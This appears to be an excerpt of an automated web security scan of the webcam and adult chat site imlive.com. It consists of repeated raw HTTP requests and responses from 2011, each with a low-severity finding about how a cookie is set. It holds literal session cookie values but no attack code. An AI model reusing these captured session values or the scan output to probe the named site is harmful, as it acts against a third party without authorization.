BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:17 GMT Connection: close Content-Length: 223493 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:49 GMT Connection: close Content-Length: 167612 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 19369 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:20 GMT Connection: close Content-Length: 16528 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:19 GMT Connection: close Content-Length: 16092 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:27 GMT Connection: close Content-Length: 9835 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preparesearch.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 18859 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sex_webcams_index/index.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 23768 Vary: Accept-Encoding
<html> <head> <title> Live Sex Chat Categories at ImLive </title> <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 33732 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:21 GMT Connection: close Content-Length: 15706 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /warningms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:28 GMT Connection: close Content-Length: 14418 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-advanced-search/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 74384 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-faq/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
